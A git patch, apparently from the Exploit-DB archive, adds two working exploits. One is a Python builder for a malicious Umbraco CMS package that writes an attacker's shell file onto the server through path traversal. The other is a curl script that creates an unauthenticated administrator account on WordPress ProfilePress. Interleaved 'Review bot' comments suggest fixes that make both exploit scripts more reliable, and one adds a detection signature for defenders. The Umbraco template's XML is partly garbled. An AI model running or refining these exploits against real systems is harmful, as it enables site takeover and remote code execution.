From 688d5586567f748b7985615b4d1f829c0415e1b7 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Wed, 1 Sep 2021 05:01:57 +0000
Subject: [PATCH] DB: 2021-09-01

2 changes to exploits/shellcodes

Umbraco CMS 8.9.1 - Path traversal and Arbitrary File Write (Authenticated)
WordPress Plugin ProfilePress 3.1.3 - Privilege Escalation (Unauthenticated)
---
 exploits/aspx/webapps/50241.py | 72 ++++++++++++++++++++++++++++++++++
 exploits/php/webapps/50242.sh | 27 +++++++++++++
 files_exploits.csv | 2 +
 3 files changed, 101 insertions(+)
 create mode 100755 exploits/aspx/webapps/50241.py
 create mode 100755 exploits/php/webapps/50242.sh
diff --git a/exploits/aspx/webapps/50241.py b/exploits/aspx/webapps/50241.py
new file mode 100755
index 000000000..291933fb0
--- /dev/null
+++ b/exploits/aspx/webapps/50241.py
@@ -0,0 +1,72 @@
+# Exploit Title: Umbraco CMS 8.9.1 - Path traversal and Arbitrary File Write (Authenticated)
+# Exploit Author: BitTheByte
+# Description: Authenticated path traversal vulnerability.
+# Exploit Research: https://www.tenable.com/security/research/tra-2020-59
+# Vendor Homepage: https://umbraco.com/
+# Version: <= 8.9.1
+# CVE : CVE-2020-5811
+
+import string
+import random
+import argparse
+import zipfile
+import os
+
+package_xml = f"""
+
+
+
+ {(unknown)}
+ {{upload_path}}
+ {(unknown)}
+
+
+
+
+ PoC-{''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(8))}
+ 1.0.0
+
+ MIT License
+ https://example.com
+
+ 0
+ 0
+ 0
+
+
+
+ CVE-2020-5811
+ https://example.com
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+"""
+
+parser = argparse.ArgumentParser(description='CVE-2020-5811')
+parser.add_argument('--shell', type=str, help='Shell file to upload', required=True)
+parser.add_argument('--upload-path', type=str, help='Shell file update path on target server (default=~/../scripts)', default='~/../scripts')
+args = parser.parse_args()
+
+if not os.path.isfile(args.shell):
+ print("[ERROR] please use a correct path for the shell file.")
+
+output_file = "exploit.zip"
+
+package = zipfile.ZipFile(output_file, 'w')
+package.writestr('package.xml', package_xml.format(filename=os.path.basename(args.shell), upload_path=args.upload_path))
+package.writestr(os.path.basename(args.shell), open(args.shell, 'r').read())
+package.close()
+
+print(f"[DONE] Created Umbraco package: {output_file}")
\ No newline at end of file
diff --git a/exploits/php/webapps/50242.sh b/exploits/php/webapps/50242.sh
new file mode 100755
index 000000000..00f1a8fa6
--- /dev/null
+++ b/exploits/php/webapps/50242.sh
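Review bot: The `os.path.isfile` guard only prints a message and falls through, so a bad `--shell` path still reaches `open(args.shell, 'r')` further down and ends in a traceback instead of a clean exit; add `import sys` to the import block and `sys.exit(1)` after the print. That same `package.writestr(..., open(args.shell, 'r').read())` line opens the file without a context manager, so the handle is never closed — `with open(args.shell, 'r') as fh:` around the read (and `with zipfile.ZipFile(output_file, 'w') as package:` around both writes, dropping the manual `close()`) fixes it. The package.xml template between `f"""` and the closing `"""` appears to have lost its XML element tags in this rendering, so the `{(unknown)}` placeholders cannot be checked here; the later `.format(filename=..., upload_path=...)` call implies the template presumably carries `{{filename}}` escapes like the visible `{{upload_path}}`, which is worth confirming against the repository copy since an unescaped name inside an f-string would raise at import time. On documentation, the header gives the CVE and the affected range (`<= 8.9.1`) but no fixed release; a `# Fixed in:` line would help readers triage.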
@@ -0,0 +1,27 @@
+# Exploit Title: WordPress Plugin ProfilePress 3.1.3 - Privilege Escalation (Unauthenticated)
+# Date: 23-08-2021
+# Exploit Author: Numan Rajkotiya
+# Vendor Homepage: https://profilepress.net/
+# Software Link: https://downloads.wordpress.org/plugin/wp-user-avatar.3.0.zip
+# Version: [1] ProfilePress (Formerly WP User Avatar) 3.0 - 3.13
+ [2] WordPress 4.7 or higher
+# Tested on: ProfilePress 3.0, Apache 2.4, and Windows Build 19043.928
+# CVE : CVE-2021-34621
+
+#!/bin/bash
+
+# Exploit for WordPress Plugin ProfilePress 3.0 - 3.1.3
+# Change the name and password as per your requirement.
+
+URL=$1
+
+curl -X POST $URL"/wp-admin/admin-ajax.php" \
+ -H "Content-Type: application/x-www-form-urlencoded" \
+ -d "reg_username=numan" \
+ -d "reg_email=pwned@numan.com" \
+ -d "reg_password=numan" \
+ -d "reg_password_present=true" \
+ -d "wp_capabilities[administrator]=1" \
+ -d "reg_first_name=pwned" \
+ -d "reg_last_name=numan" \
+ -d "action=pp_ajax_signup"
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 76a98195e..d88929950 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -44365,3 +44365,5 @@ id,file,description,date,author,type,platform,port
 50238,exploits/multiple/webapps/50238.py,"Strapi 3.0.0-beta.17.7 - Remote Code Execution (RCE) (Authenticated)",2021-08-30,"David Utón",webapps,multiple,
 50239,exploits/multiple/webapps/50239.py,"Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution (RCE) (Unauthenticated)",2021-08-30,"Musyoka Ian",webapps,multiple,
 50240,exploits/php/webapps/50240.txt,"Projectsend r1295 - 'name' Stored XSS",2021-08-30,"Abdullah Kala",webapps,php,
+50241,exploits/aspx/webapps/50241.py,"Umbraco CMS 8.9.1 - Path traversal and Arbitrary File Write (Authenticated)",2021-08-31,BitTheByte,webapps,aspx,
+50242,exploits/php/webapps/50242.sh,"WordPress Plugin ProfilePress 3.1.3 - Privilege Escalation (Unauthenticated)",2021-08-31,"Numan Rajkotiya",webapps,php,
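Review bot: The `#!/bin/bash` that appears after the header comments is not a shebang, since an interpreter line is only honored as the very first line of the file; as committed, running the file directly falls back to whatever shell the caller happens to use, so move `#!/bin/bash` above the `# Exploit Title:` line. The ` [2] WordPress 4.7 or higher` continuation of the `# Version:` line carries no `#` and, if it is its own line as the 27-line hunk count suggests, will be parsed as a command rather than a comment; prefix it with `#`. `$URL` is unquoted in the `curl` line and nothing checks that `$1` was supplied, so an empty argument silently posts to a relative path; `[ -z "$1" ] && { echo "usage: $0 <url>" >&2; exit 1; }` together with `"$URL/wp-admin/admin-ajax.php"` makes that failure explicit. For defenders the request shape is fully visible in this hunk — an unauthenticated POST to `admin-ajax.php` with `action=pp_ajax_signup` carrying a `wp_capabilities[administrator]` field — which is the combination a WAF rule or web-log search for CVE-2021-34621 should key on.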